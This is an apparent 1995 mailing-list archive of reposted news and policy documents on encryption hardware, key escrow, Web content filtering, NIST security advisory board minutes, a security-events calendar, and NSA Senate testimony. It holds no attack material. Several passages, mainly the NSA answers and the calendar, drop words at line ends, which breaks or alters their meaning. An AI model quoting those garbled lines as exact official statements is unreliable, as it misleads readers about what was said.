San Francisco, Sept. 6, 1995 -- Vias & Associates Inc.
said it has introduced a new version of its "Snooper"
system information utility. The author of the software
said it is called Snooper because the program "snoops"
around the computer to report its configuration and
operating characteristics.
John Vias of Vias & Associates said his
company's program goes farther than other system
information programs, including Microsoft's MSD
(Microsoft System Detection), which is included in higher
versions of the company's DOS operating systems. "I think
Snooper is about the most accurate system information
utility you can get," he said. "People say it's easy to
use. It takes just one keystroke to go from the main
screen to any other screen. It also has a built-in editor
for 'autoexec' and 'config' files."
In all, Snooper can detect more than 150 details about a
person's computer, including CMOS settings, hard drive
type and capacity, any installed Micro Channel cards,
fax-modems, memory types and amount available to the
user, and video memory and type.
Snooper is targeted to all markets, Vias officials said,
including the average user, network administrators,
consultants, and technicians.
In the provided documentation is a wish list regarding
new features for future versions of Snooper, including
brand detection of additional non-Intel central
processing units (CPUs), detection of local bus cards and
tapes, and the ability to differentiate among different
types of hard drives.
Although Snooper can run in either DOS or Windows, Vias
said the program works best in the DOS environment. In
Windows, some of the software's reports must be disabled.
In addition, some of the test results may be in error or
unpredictable. Snooper requires an IBM PC or 100%
compatible machine, with at least 256 kilobytes (KB) of
RAM, a DOS with version 3.1 or higher, and some kind of
video card. Snooper retails for around $39, and is
available as both a full version and as shareware.
Vias also said he is working hard on a Windows 95 version
of Snooper. When tested the software on a Windows 95
machine running in DOS mode, no problems were
experienced. But running it in Windows mode made the
program very unpredictable.
UK - PCMCIA Encryption Card Introduced
London, Sept. 5, 1995 -- PPCP, a PCMCIA (Personal
Computer Memory Card International Association)
specialist, has begun shipping the Session Key, a PCMCIA
Type II card from SCI Canada.
According to John Nolan, the company's managing director,
the card allows users to encrypt data on their PC hard
disk, as well as across serial port linked devices, such
as modems, using the DES algorithm. DES stands for Data
Encryption Standard, a US-originated high security
encryption system that is virtually unbreakable.
According to Nolan, the Session Key allows users to
protect their data on a selective basis. "Many of the
competing systems out there are only capable of
encrypting the user's entire hard disk. That obviously
protects the user's data, but if you forget your
password, you have serious problems," he explained.
"With the Session Key card, you create a new drive, the
'D' drive, to store the encrypted data. The card also
allows data to be transmitted by modem in DES format.
That allows a user maximum flexibility," he said.
When used to encrypt data on a user's hard disk, once the
Session Key is removed from the PCMCIA slot, all data on
the disk that is encrypted is protected against
unauthorized access. The encrypted data cannot be read or
used without reinserting the UKP349 card.
Nolan said that SCI has developed a second-generation
version of the Session Key, which will be available later
this year. "That version will use RSA encryption
techniques, as well Triple DES and a whole host of other
encryption systems," he said.
One of the problems with encryption devices like the
Session Key is the fact that the US Government currently
bans the export of certain types of encryption
technologies, as well as restricts the sale of many
technologies to "known parties."
According to Nolan, this approval system can cause the
company a few administrative problems. "We need to find
out who is the actual end-user and pass their details
back to SCI. My understanding is that the vetting is then
carried out at a government level in Canada or the US,"
he said. He added that, apart from a short delay,
typically a week or so before the card can be shipped to
the customer, there is usually no problem.
Reader Contact: PPCP, tel +44-181-893-2277, fax
+44-181-893-1182, Internet e-mail
100302.1470 at compuserve.com/PPCP950905/PHOTO)

@_date: 1995-09-08 19:10:34
@_author: Anonymous 
@_subject: Web Exon A-rate 
WS Journal, Sept. 8, 1995.
Cleaning the Web: Companies to Seek Pornography Blocker
Array of Technology Firms Will Join in Effort to Let
Parents Screen the Internet
By Jared Sandberg
Some of the high-tech industry's biggest companies are
banding together in a broad-based consortium to develop
a way for Internet users to screen out pornography and
other offensive material.
The group, whose creation is expected to be announced on
Monday, is believed to include International Business
Machines Corp. and Microsoft Corp., telecommunications
giants AT&T Corp. and MCI Communications Corp., on-line
firms America Online Inc. and Netscape Communications
Corp. Entertainment heavyweights Time Warner Inc. and
Viacom Inc. also have been approached.
People familiar with the plans said the consortium hopes
to develop industrywide standards for obscenity-blocking
technology as a way to forestall much-criticized
proposals from federal regulators. It amounts to an
effort to develop a voluntary Internet equivalent of the
"v-chip" that has been proposed as a way for parents
block sex-and-violence-laden TV programs.
The venture will pursue a system that would allow
Internet users -- such as teachers or parents -- to
prevent pornography from being accessed by children.
The group will be led by the World Wide Web Consortium at
the Massachusettes Institute of Technology, executives
said. The consortium, funded by roughly 80 companies,
aids in the development of the Web, the multimedia
portion of the Internet, by producing technical
specifications and software.
Various companies have worked on ways to shield children
from indecent material. The new consortium will pursue an
overarching method available to all Internet players --
software firms, access providers and on-line services.
MIT will coordinate this "umbrella organization to
prevent industry infighting," said one executive. "It's
aimed at creating a standard that all the software
companies can develop for." A separate project by
Microsoft and Netscape, together with two smaller firms,
SurfWatch Software Inc. and Progressive Networks Inc.,
will now be folded into the new consortium, another
executive said.
The effort follows such proposals as the antipornography
provision of Sen. James Exon (D., Neb.), which won
overwhelming support in the Senate and would slap prison
terms on people who make "indecent" remarks on-line.
Most of the proposals have been met with scorn from the
Internet industry. Executives have said that legislators
could cripple the commercial growth of the Internet
before it emerges from infancy.

@_date: 1995-09-10 15:20:25
@_author: Anonymous 
@_subject: Nice Guys 
NY Times, Sept. 10, 1995.
   The Decline of the Nice-Guy Quotient
   By Daniel Goleman
   Contrary to conventional wisdom, nice guys do finish first.
   The trouble is, nice guys are harder and harder to find.
   Amid the agonizing over standardized intelligence tests
   comes a new problem to worry about. Psychologists seeking
   a broader measure of intelligence, one that accounts for
   the personality traits that seem to predict success better
   than IQ alone, have discovered that a newly minted virtue
   they call "emotional intelligence" is declining as well.
   A recent study done at Bell Laboratories the high-tech
   think tank near Princeton N.J., found that the most valued
   and productive engineers -- at least among electrical
   engineers working in teams of up to 150 people -- were not
   those with the highest IQs, the highest academic
   credentials or the best scores on achievement tests.
   Instead, the stars were those whose congeniality put them
   at the heart of the informal communication networks that
   would spring up during times of crisis or innovation.
   When these likeable engineers hit a snag and E-mailed for
   help, they got an answer instantly; when others less gifted
   in interpersonal realms sent similar messages, they
   sometimes waited days or weeks for a reply.
   The standouts excelled in rapport, empathy, cooperation,
   persuasion and the ability to build consensus among people.
   The new term for these traits is emotional intelligence,
   which, in addition to the social graces, includes the
   ability to read one's own feelings, to control one's own
   impulses and anger, to calm oneself down and to maintain
   resolve and hope in the face of setbacks.
   To predict the success of a financial analyst or
   geophysicist, IQ is still crucial. But within a pool of
   high-lQ people, those with high emotional intelligence will
   have an extra competitive edge.
   Emotional intelligence, like self-knowledge and personal
   charisma, has long been seen as ineffable, more the stuff
   of poets and philosophers than psychometricians. And yet,
   despite all that, the measuring has begun.
   In the mid-1970s, and again in the late 1980s, Thomas
   Achenbach, a psychologist at the University of Vermont, had
   thousands of American children assessed by their parents
   and teachers on a behavioral checklist. He found that over
   the course of that decade and a half, America's children,
   on average, had become more anxious and depressed, more
   impulsive and mean, more demanding and disobedient, more
   hot-tempered and aggressive -- and not just in beleaguered
   urban neighborhoods.
   The study found growing emotional deficits even among the
   children of the wealthiest suburbs. Although the scores
   were worst for the poorest children, the rate of decline
   was the same for all, privileged and impoverished alike.
   Apparently, students continue to be receptive even into
   their teen years. Neuroscientists have found that the
   centers in the prefrontal lobes that control emotional
   impulse are among the last parts of the brain to reach full
   maturity, sometime in mid- to late adolescence.
   Now, at last, from the emotional literacy front there is
   some promising news: Children in the courses show marked
   improvements in the ability to control their impulses, show
   empathy, cooperate with others, manage anger and anxiety,
   focus on a task, pursue goals and resolve conflicts.
   Delinquency, fights and drug use drop.
   And there is an added bonus: achievement test scores rise
   too.

@_date: 1995-09-10 20:23:55
@_author: Anonymous 
@_subject: Security Policy Documents 
Computer Security Resource Clearinghouse WWW Server
                           SECURITY POLICY DOCUMENTS
   These are computer security policy documents, primarily from    Department of Commerce, and the Office of Management and    [?] Search Security Policy Documents
   a130app3.txt [62983 bytes]
           1995-03-29 Proposed Revision of OMB Circular No.           Appendix III
   doj-fg.zip [172668 bytes]
           1994-07-04 "Searching and Seizing Computers," U.S. Dept. of
          Justice, Federal Guidelines, July 1994 (zipped           file)
   omba130.txt [80748 bytes]
           1994-06-06 Office Management and Budget
   cryptpol.wp [68689 bytes]
           1994-03-01 Cryptography: Policy and Technology    doc-copy.txt [4600 bytes]
           1993-11-23 Department of Commerce's Software Copyright Policy
   doc-poli.txt [86434 bytes]
           1993-11-23 Department of Commerce's Chapter 10 of the DOC IT
          Management Handbook, which contains the IT Security           for the Dept.
   doc-man.txt [253689 bytes]
           1993-11-19 Department of Commerce beginning sections of the
          DOC "Information Technology Security Manual"
   a130.zip [26986 bytes]
           1992-06-08 Proposed Revision to OMB Circular A-130
   sec_2315.txt [2150 bytes]
           1992-02-27 Sect. 2315 of U.S. Code Title 10
   omb_a130.txt [97630 bytes]
           1992-02-27 OMB Circular A-130, "Management of           Information Resources"
   opm_plcy.txt [12951 bytes]
           1992-02-27 Computer Security Training Policy
   csa_87.txt [153493 bytes]
           1992-02-27 Computer Security Act of 1987
   rfc1244.txt [253471 bytes]
           1991-11-08 Very good summary of site security

@_date: 1995-09-10 21:50:18
@_author: Anonymous 
@_subject: GAK Advisory Board 
Minutes of the March 22-23, 1995 Meeting of the
  Computer System Security and Privacy Advisory Board
Wednesday, March 22, 1995
A quorum being present, the Chairman, Dr. Willis Ware,
called the meeting to order at 9:00 a.m. at the Holiday
Inn, Gaithersburg, Maryland.  Besides Dr. Ware, the
following Board members were present:  Charlie Baggett
Jr., Genevieve Burns, Cris Castro, Don Gangemi, Sandra
Lambert, Henry Philcox, Randy Sanovic, Stephen Trodden,
Steve Walker [TIS], and Bill Whitehurst [IBM].
[Snip long section on security assurance standards and
methods in US, Canada and UK.]
Update on X/Open Branding Project
Mr. Bill Whitehurst, IBM, gave a brief update of the
activities of the X/Open Branding Project.
Two major components exist within their branding concept:
(1) the ability to implement functionality based on a
minimum set of assurance functionality requirements
(MSFR), and (2) the confidence in the development process
for achieving the functionality.
He said that the workgroup meeting, hosted by Hewlett
Packard, was held early in March.  The group plans to
re-write their document to include some type of
evaluation process prior to the vendor product getting
branded.  X/Open plans to have a public review of the
changes this summer.
Vendor Perspective
Ms. Linda Vetter, Oracle Corporation, presented oracle's
views of security assurance.  She discussed three types
of assurance issues: (1) governent evaluation and
certification; (2) third party evaluation and
certification (government and business sponsored); and
(3) vendor claims.
Ms. Vetter explained Oracle s evaluation experience for
two DBMS server product s, Oracle7 and Trusted Oracle7,
in both the US and the UK.  Oracle used the US TCSEC TPEP
evaluation for B1 and C2 systems.  They also used the UK
ITSEC evaluation for E3 systems (which is the equivalent
for US B1 and C2 systems).  The UK process took
significantly less time and cost less money for an
identical product.  Ms. Vetter suggested that NIST/NSA
look into developing equivalent/comparable trust levels
between the two different evaluation criteria methods as
well as those for other countries.  This would minimize
the need to have different evaluations performed (one for
each country) for the same product.
Oracle has on-going work in other areas (e.g., RAMP, CMM,
ISO, and Audits) as well as multiple CLEFS with the UK,
Sweden, France and Germany.  Ms. Vetter explained the
differences in criteria between the TCSEC and the ITSEC. She said that the ITSEC requirements for the content of
evaluation deliverables formed a superset of the
corresponding TCSEC requirements for the evaluations. However, the TCSEC creates a framework for the
presentation of these requirements and there can be
little deviation from this.
Oracle would like to see more concentration on low-end
assurance requirements and processes.  This would enable
various sectors like health care, banking, and financial
industries to have protection for unclasified to
sensitive data.  Ms. Vetter encouraged NSA to continue
its efforts in modeling (Common Assurance Framework,
TCMM, and SE CMM) and would discourage any more efforts
in product profiling.  The modeling efforts encourage
vendor quality improvement, promotes flexibility in
meeting assurance objectives, and are transferable to
other private sector domains besides DoD.  (See Reference
Wrap-up and Restatement of Issues
Dr. Katzke summarized the discussion of assurance by
saying that opportunities exist to look at alternatives. He is not sure what the government's role is or which
areas to concentrate on with respect to cost.  He said
that he could continue with the same level of effort that
is going on now with community involvement.  He is open
to suggestions with regard to the assurance process.
After a lengthy discussion on the state of the Common
Criteria (CC) and assurance approaches and issues, some
of the major points from individual Board members
-  Concern as to when the CC will be widely accepted and
   used;
-  Whether to adopt the ITSEC now and migrate to CC;
-  The need to simplify the CC;
-  Building assurance and quality into the new assurance
   framework;
-  Clearly define assurance needs to be universally
   understood;
-  Conduct more C2 and below evaluations in the US;
-  Concentrate on low-end assurance; and
-  Bring key industry players into the process.
Board members continued their discussion of criteria and
assurance from the previous day.  Some of the major
points of the discussion from Board members included the
-  for OMB to state the need for C2 level evaluation
   compliance for various government product purchases;
-  for NSA to make a statement about equivalency among
   all existing non-US trust levels;
-  to begin using components of the Common Criteria and
   gradually migrate to it;
-  to continue a wide range of assurance framework
   options and procedures; and
-  to focus on low-end assurance methods and encourage C2
   level evaluation along the following Canadian AL-1
   evaluation.
Status of Key Escrow Initiative
Mr. Steve Walker, Trusted Information Systems (TIS),
briefed the Board on the status of Commercial Key Escrow
(CKE).  He said, with regard to application vendors, TIS
is actively seeking the participation of commercial
software vendors in widespread implementation of CKE
enabled software products.  TIS has installed a Data
Recovery Center (DRC) on the Internet and is prepared to
distribute sample DRC application software packages to
any interested software application developer.  TIS is
seeking approval of the US government for export of
application programs using encryption algorithms such as
the Data Encryption Standard (DES) when properly bound
with CKE.
Mr. Walker said the advantages of CKE for government
interests is that if the TIS CKE system were to become
widely used throughout the private sector and government
communities, law enforcement, national security and
private sector interests would be preserved.
Mr. Walker said that TIS has filed for patent protection
for its Software Key Escrow (Clipper equivalent) and CKE
systems including the DRC and application software
approaches.  TIS is prepared to license its CKE system
and software applications technology to any software or
hardware vendor under very favorable licensing terms. TIS is also prepared to license its DRC system and
technology to qualified DRC operators and vendors under
similarly favorable licensing terms.  (See Reference
            National Computer System Security
                and Privacy Advisory Board
Identifying Emerging Computer Security Issues
What is the Computer System Security and Privacy Advisory
Board (CSSPAB)?
Congress established the CSSPAB as a public advisory
board in the Computer Security Act of 1987.  The Board is
composed of twelve members, in addition to the
Chairperson, who are recognized experts in the fields of
computer and telecommunications systems security and
What is the Board's purpose?
The Computer Security Act specifies that the Board's
mission is to identify emerging managerial, technical,
administrative, and physical safeguard issues relative to
computer systems security and privacy.
What is the scope of the Board's authority?
The Board examines those issues affecting the security
and privacy of sensitive unclassified information in
federal computer and telecommunications systems.  The
Board's authority does not extend to private-sector
systems or federal systems which process classified
What are the board's advisory and reporting functions?
The Board advises the Secretary of Commerce and the
Director of the National Institute of Standards and
Technology (NIST) on computer security and privacy issues
pertaining to sensitive unclassified information stored
or processed by federal computer systems. The Board
reports its findings to the Secretary of Commerce, the
Director of the Office of Management and Budget, the
Director of the National Security Agency, and appropriate
committees of Congress.
How often and where does the Board meet?
The Board holds its two-day meetings twice per year;
however, additional meetings may be called at the
Chairperson's discretion. Board meetings are held in the
Washington, DC metropolitan area as well as other areas
in which there is significant federal computer security
interest and activity.
Are Board meetings open to the public?
In accordance with the Federal Advisory Committee and
Government in Sunshine acts, Board meetings are announced
in the Federal Register and are normally open to the
public.  The Board accepts written statements from the
public (see address on reverse).
How is CSSPAB membership determined?
The Director of NIST of the Department of Commerce
appoints Board members for four-year terms.  By law, the
membership of the Board is distributed as follows:
-  Four experts from outside of federal government, one
   whom is representative of small- or medium-size firm;
-  Four non-government employees who are not employed by
   or a representative of a producer of computer or
   telecommunications equipment; and
-  Four members from the federal government, including
   one from the National Security Agency of the
   Department of Defense.
Nominations to fill vacancies on the Board may be
submitted to the Director of NIST.
NIST personnel serve as the Board's Secretariat.  Other
federal agency personnel may also assist the Board's
activities as specified in the Computer Security Act of
Are Board members paid for their service?
Board members do not receive a salary or stipend;
however, authorized travel expenses are reimbursed as
specified by Congress.
For further information, please contact:
Computer System Security and Privacy Advisory Board
Executive Secretariat
National Computer Systems Laboratory
Technology Building, Room B-154
National Institute of Standards and Technology
Gaithersburg, MD  20899

@_date: 1995-09-10 23:00:20
@_author: Anonymous 
@_subject: GAK Advisory Board 94 
Executive Summary
This Annual Report documents activities of the National
Computer System Security and Privacy Advisory Board
during 1994, its sixth year.
During the year, the Board continued to review
cryptography related issues.  During 1994, the
Escrowed Encryption Standard (EES) and the Digital
Signature Standard (DSS) were approved as Federal
Information Processing Standards (FIPS 185) and (FIPS
186) respectively.  The Board heard briefings on
escrowing release procedures, escrow program procedures,
U.S. export procedures, international cryptography
proposals, international corporate key escrow,
alternative key escrow approaches, and software-based key
escrow encryption.
The Board also continued to follow activities related to
the Common Criteria (CC), which remains in draft form. [Comments on the CC will be reviewed and processed in
March 1995.] The Board continued to examine the
question as to whether there is a business case for
setting up a Trusted Technology Assessment Program
Currently, Dr. Willis H. Ware, a senior researcher of the
Corporate Research Staff of RAND, serves as Chairman of
the Board.  He was appointed in July 1989.  As of
December 1994, the membership of the Board is as follows:
-  Chairman
   Willis H. Ware, RAND
-  Federal Members
   Charlie C. Baggett, Jr. National Security Agency
   Henry H. Philcox, Department of the Treasury, Internal
      Revenue Service
   Cynthia C. Rand, Department of Transportation
   Stephen A. Trodden, Department of Veterans Affairs
-  Non-Federal, Non-Vendor
   Genevieve M. Burns, Monsanto Corporation (Member
      Designate)
   Cris R. Castro, KPMG Peat Marwick
   Sandra Lambert, Citibank
   Randolph Sanovic, Mobil Corporation (Member Designate)
-  Non-Federal, Vendor
   Gaetano Gangemi, Wang Laboratories, Inc.
   Linda Vetter, Oracle Corporation (Member Designate)
   Stephen T. Walker, Trusted Information Systems, Inc.
   Bill Whitehurst, International Business Machines Corp.
In December of 1994, Ms. Cynthia Rand resigned from the
Board, leaving a vacancy in the federal member category.
              II. Major Issues Discussed
The work of the Board during 1994 was devoted to various
topics related to security of federal unclassified
automated information systems.  Among the most important
-  Cryptographic Key Escrowing Procedures
-  Alternative Key Escrow
-  Security in the National Information Infrastructure
   (NII)
Escrowing Release/Program Procedures
The Department of Justice briefed the Board on procedures
for release of cryptographic key components, by the two
escrow agents, to government agencies.  The two escrow
agents at the National Institute of Standards and
Technology (NIST), of the Department of Commerce and the
Automated Systems Division of the Department of Treasury. The agents act under strict procedures to ensure the
security of the key components and which govern their
release for use in conjunction with lawful wiretaps.
NIST discussed the procedures for the key escrow program. Five federal agencies share a role in the key escrow
program:  (1) the Department of Justice is a sponsor and
a family key agent that holds one of the components of
the family key, (2) the Federal Bureau of Investigation
is the initial law enforcement user and a family key
agent that holds the other component of the family key,
(3) NIST has a dual role as the program manager and a key
escrow agent, (4) the Department of Treasury is a key
escrow agent; and (5) the National Security Agency
is the system developer that provides technical
Alternative Key Escrow
Bankers Trust presented some rationales for key escrow
encryption for corporations, which fulfills management
supervision and compliance duties, and reduces business
risks.  They maintain that the Bankers Trust system can
meet both U.S. and European needs.  Their system has been
discussed with Canada, Britain, France, Singapore, and
the U.S.; however, none of these countries have
endorsed the system.
Trusted Information Systems, Inc. gave a demonstration
and overview of their approach to software-based key
escrow encryption.  They said that software key escrow
systems could be built that meet the objectives of law
enforcement.  Also, that variations of their software key
escrow system can provide a commercial key escrow
capability that will be very appealing to corporate and
individual computer users.  They believe that widespread
use of corporate key escrow, in which corporations
operate their own key escrow centers, and individual key
escrow, in which bonded commercial key escrow centers
provide a key retrieval capability for registered users,
will better achieve the key escrow objectives of law
enforcement than a government-operated key escrow
[Snip 180kb of very informative docs on the main US
cryptography issues of 1994, still alive in '95.]

@_date: 1995-09-11 06:40:40
@_author: Anonymous 
@_subject: Comp Sec Calendar 
Last update: 07/24/95
                  COMPUTER SECURITY EVENTS CALENDAR
    This file contains a list of upcoming computer security     The absence or inclusion of any particular event does not     criticism or endorsement by the National Institute of     and Technology or the sysop.  Because of the nature of this
    material and how it is obtained, it is impossible to     every event.  If you know of computer security events that     not listed, please send the conference/course literature     requests to the following:
           Computer Security Resource Clearinghouse (Events            National Institute of Standards and Technology
           Room A-216, Bldg. 225
           Gaithersburg, MD 20899
           webmaster at csrc.ncsl.nist.gov
[Snip sessions before 9/7]
DATE:      09/07/95
TITLE:     Information Warfare Conference (InfoWarCon) '95
LOCATION:  Arlington, VA
SPONSOR:   National Computer Security Association (NCSA)
CONTACT:   National Computer Security Association
ADDRESS:   10 S. Courthouse Ave.
CITY_ST:   Carlisle, PA 17013
PHONE:     (717) 258-1816
DATE:      09/11/95
TITLE:     ASIS 41st Annual Seminar & Exhibits
LOCATION:  New Orleans, LA
SPONSOR:   American Society for Industrial Security (ASIS)
CONTACT:   Society for Industrial Security
ADDRESS:   1655 North Fort Myer Dr., Suite 1200
CITY_ST:   Arlington, VA 22209
PHONE:     (703) 522-5800
DATE:      09/11/95 - 09/13/95
TITLE:     Exploring the Hostile Cyberspace
LOCATION:  Cleveland, OH
SPONSOR:   NASA Lewis Research Center, et al.
CONTACT:   New Dimensions International
ADDRESS:   P. O. Box 897
CITY_ST:   Cardiff, CA 92007
PHONE:     (619) 436-5618
DATE:      09/12/95
TITLE:     COSAC '95
LOCATION:  Dublin, Ireland
SPONSOR:   Republic of Ireland AKA Associates
CONTACT:   AKA Associates
ADDRESS:   7 Darragh Road
CITY_ST:   Crossgar, Co. Down, BT30 9NP
E-MAIL:    cosac95 at ibm.net
DATE:      09/14/95
TITLE:     Network Security (LAN's Client/Server and the LOCATION:  St. Louis, MO (other dates and locations available, call CSI)
SPONSOR:   CSI (Computer Security Institute)
CONTACT:   CSI
ADDRESS:   600 Harrison Street
CITY_ST:   San Francisco, CA 94107
PHONE:     (415) 905-2626
DATE:      09/17/95
TITLE:     LISA 9th Systems Administration Conference
LOCATION:  Monterey California
SPONSOR:   USENIX, ACSTPA, SAGE
CONTACT:   USENIX Conference Office
ADDRESS:   22672 Lambert Street, Suite 613
CITY_ST:   Lake Forest, CA 92630
PHONE:     (714) 588-8649
DATE:      09/18/95
TITLE:     7th Commputer Security Incident Handling Workshop
LOCATION:  Karlsuhe, Germany
CONTACT:   Rechenzentrum Uni Karlsruhe, Herr Fischer
ADDRESS:   Zirkel 2
CITY_ST:   D-76131 Karlsruhe, Germany
PHONE:     +49 721 376422
DATE:      9/20/95
TITLE:     Acquisition Streamling and Information Warfare
LOCATION:  Koran Room, Ft. Myer Officers Club in Arlington, VA
CITY_ST:   Arlington, VA
PRESENTER: Anthony Valletta, Deputy Assistant Secretary of Defense, C3I - Acqui
PHONE:     (202) 828-1920 for info or reservations
DATE:      10/10/95
TITLE:     18th National Information Systems Security LOCATION:  Baltimore, MD
SPONSOR:   NSA/NCSC and NIST/CSL
CONTACT:   Tammie Grice
ADDRESS:   NIST, Room A807, Bldg 101
CITY_ST:   Gaithersburg, MD 20899
PHONE:     (301) 975-3883
DATE:      10/19-20/95
LOCATION:  Bethesda, MD
SPONSOR:   ABA, NIST, USCIB, ...
CONTACT:   Worldwide Electronic Commerce Conference '95
ADDRESS:   PO Box 743485
CITY_ST:   Dallas, TX  75374
PHONE:     214.516.4900
EMAIL:     wec at multicorp.com
URL:       DATE:      10/24/95
TITLE:     The Business Recover Managers Symposium
LOCATION:  San Diego, CA
SPONSOR:   MIS Training Institute
ADDRESS:   498 Concord Street
CITY_ST:   Framingham, MA 01701-2357
PHONE:     (508) 879-7999
DATE:      11/06/95
TITLE:     CSI's 22nd Annual Computer Security Conference
LOCATION:  Washington, D.C.
SPONSOR:   Computer Security Institute
CONTACT:   Computer Security Institute
ADDRESS:   600 Harrison St.
CITY_ST:   San Francisco, CA 94107
PHONE:     (415) 905-2626
DATE:      12/11/95
TITLE:     11th Annual Computer Security Applications LOCATION:  New Orleans, LA
SPONSOR:   Applied Computer Security Associates
CONTACT:   Ann Marmor-Squires
ADDRESS:   TRW Systems Division
CITY_ST:   Fairfax, VA 22033
PHONE:     (703) 803-5503
DATE:      05/15/97
TITLE:     Security and Audit Oracle
LOCATION:  Washington, D.C.
SPONSOR:   MIS & Dept. of Justice
CONTACT:   Pat Ciuffreda
ADDRESS:   CTTS/IRM/JMD, Room 1211-ARB
CITY_ST:   Washington, DC 20530
PHONE:     (202) 616-2018

@_date: 1995-09-13 00:10:27
@_author: Anonymous 
@_subject: NYT on GAK 
But you can't have strong anonymity without strong cryptography.

@_date: 1995-09-13 07:15:44
@_author: Anonymous 
@_subject: Dirty Jobs Ad 
NY Times, Sept 13, 1995. For the outawork:
C.I.A.'s Chief Calls Covert Action a Must
Washington, Sept. 12 -- The Central Intelligence Agency
will maintain, and perhaps increase, its covert
operations abroad and continue to hire informers from
terrorist cells, military regimes and drug syndicates,
the new Director of Central Intelligence said today.
The Director, John M. Deutch, called espionage "the core
mission of the Central Intelligence Agency." That mission
has been questioned by critics of the C.I.A. in Congress
and the foreign-policy establishment, who wonder whether
the rewards of secret information are worth the risks of
undertaking covert operations and recruiting murderous
and corrupt foreign agents.

@_date: 1995-09-13 21:25:54
@_author: Anonymous 
@_subject: NSA on GAK 
The opening comments here by Admiral McConnell of the NSA appear to
parallel the comments of Mr. Michael Nelson at the September 6 Key Escrow meeting on the use of encryption by "spies, and criminals."
URL: Note:  The following answers were provided by NSA to the Senate
Subcommittee on Technology and the Law in response to their up questions to the May 3, 1994 hearings.
                   ---------------------------
          Senate Subcommittee on Technology and the Law
 Hearing on the Administration's Key Escrow Encryption Standard
        Written Questions for Vice Admiral McConnell, NSA
*Questions for Senator Pressler:
Q:   Admiral, as you are aware, critics of the Administration's
proposal argue that as a practical matter, no criminal, foreign
spy, or terrorist of any sophisticated would be foolish enough use an encryption device designed by the NSA and approved by How do you respond? Why do[n't you] think the people whose
telecommunications the NSA and the FBI want most to decode will the very people most unlikely to use this technology?
Answer:   From what we know today, the overriding requirement spies, terrorist, and criminals have is for readily available easy to use equipment that interoperates.  Key escrow encryption is
not meant to be a tool to catch criminals.  It will make encryption available to legitimate businesses and private without allowing criminals to use the telecommunications system plan and commit crimes with impunity.  We believe it would be
irresponsible for government to make excellent encryption available knowing that its use by criminals would make it
impossible for law enforcement agencies to conduct lawful against them.
The Department of Justice credits information gleaned through
wiretaps as leading to more than 20,000 felony convictions the early 1980s.  This would not have been possible if the
criminals had been using encryption systems the FBI could not
Without government action, however, this fortunate situation
will change.  At present most people, and most criminals, don't encryption.  However, there is an increasing public awareness the value of encryption for protecting private personal and
business communications.  Increasing demand for encryption by public will likely lead to the widespread use of some form of
standardized encryption on the public telecommunications This development would have great benefits for the country.
Legitimate businesses an private individuals could use the
telecommunications system secure in the knowledge that their
private information such as business records and credit card
numbers could not be intercepted by third parties.
But there is a down side.  Criminals, terrorists, and others
could also use the system to plan crimes, launder money, and like, completely secure in the knowledge that law enforcement
agencies could not listen to those communications.  Just as
legitimate businesses operate much more efficiently and using the telecommunications system than they could without it, will criminal enterprises be able to operate more efficiently effectively if they no longer have to avoid using the
telecommunications system.
The United States is faced with a choice.  We can sit back and
watch as the emerging national information infrastructure a valuable tool for criminals and terrorists to use to plan and
carry out their activities with complete security, or we can steps to maintain the current ability of government to conduct
lawful wiretaps so that prudent criminals will have to find less efficient ways to operate and foolish ones may be caught.  escrow encryption is the later option.
Q:   Would widespread use of the Skipjack algorithm harm U.S.
exports?  Do you think it is unlikely foreign businesses will
purchase American encryption technology if the U.S. Government
holds a set of the decoding keys?
     Answer:  I do not believe that widespread use of key encryption in the United States will harm U.S. exports.  If it any effect at all, it could increase exports somewhat.  Key encryption products provide another option for foreign that they have not had in the past; to the extent that doe purchase key escrow encryption products, it will mean an
increase in exports.  Meanwhile, U.S. exporters are free to
continue to sell the products they currently sell in foreign
markets and to seek license approvals for new products.
     It is difficult to predict the foreign market for U.S. key
escrow encryption technology.  Businesses that fear U.S. interception of their communications presumably would avoid
products for which the U.S. Government hold keys.  However, are a number of reasons why foreign businesses might purchase One major reason would be to communicate securely with U.S.
businesses that use them.  In addition, the superior level of
security provided by key escrow products (against all but U.S. Government access) may make them attractive to foreign
business that do not view U.S Government access as a major While some prospective users abroad may steer clear of key products because the United States will retain access, there may be
many who believe they are unlikely to be targeted by U.S.
intelligence in any case or for whom the superior security by key escrow encryption products against threats of greater
concern may make key escrow products an attractive option.  For
example, a distributor of pay-TV programming may depend on
encryption to ensure that only those viewers who pay for the
service can decrypt the TV signal.  Such a distributor probably
would not be concerned about the threat of access by the United
States Government, and might favor suitable key escrow products over competing products that use weaker encryption
Q:   You were present when the previous panelist, Stephen described how present U.S. laws prohibit his company from encryption products.  As I understand it, Senator Murray's bill
S.1846, attempts to relax these export controls somewhat.
Please give us your views on this legislation.
     Answer:  I support the Administration's position, as by the White House on February 4, that current export controls remain in place and that regulatory changes should be to speed exports and reduce the licensing burden on exporters.  bill you reference appears to be inconsistent with the
Administration position.  I would be happy to provide you information on the Administration's reasons for maintaining the
current export controls in an appropriate setting.
*Questions from Senator Murray:
Q:    In my office in the Hart building this February, I from the Internet an Austrian program that uses DES encryption.
This was on a laptop computer, using a modem over a phone line.
The Software Publishers' Association says there are at least DES or comparable programs world wide.  However, U.S. export
control laws prohibit American exporters from selling DES programs abroad.
With at least 20 million people hooked up to the
Internet, how do U.S. export controls actually prevent terrorists, or whoever from obtaining DES encryption software?
     Answer:  Serious users of encryption do not entrust their
security to software distributed via networks o bulletin There is simply too much risk that viruses, Trojan Horses,
programming errors, and other security flaws may exist in such
software which could not be detected by the user.  Serious users of
encryption, those who depend on encryption to protect valuable and cannot afford to take such chances, instead turn to other
sources in which they can have greater confidence.  Such users include not only entitles which may threaten U.S. security interests, but also businesses and other major of encryption products.  Encryption software distribution via
Internet, bulletin board, or modem does not undermine the
effectiveness of encryption export controls.   [Primary written questions for Admiral McConnell]
1.   The Defense Authorization Bill for Fiscal Year 1994 has
authorized $800,000 to be spent by the National Research Council of
the National Academy of Sciences to conduct a study of federal
encryption policy.  Can we wait to implement the key escrow
encryption program until we have the benefit of the NRC's Do you think this study is necessary?  Should this study be
     Answer:  We do not believe that we can wait until after NRC study is completed in 1996 to begin implementation of the escrow initiative.  The information technology industry is and fast-moving, and to wait another two years or more would, believe, jeopardize the success of the initiative.  Industry for encryption products is growing, and the technology is now to meet that demand with encryption products that provide outstanding level of security to the user conduct lawful To wait for the completion of the NRC study to other encryption
products which would defeat lawful wiretaps.  We believe that a delay would not be in the best interest of the American Neither do we believe that the study should be expedited.  For
our part, we will carefully consider the conclusions of the NRC
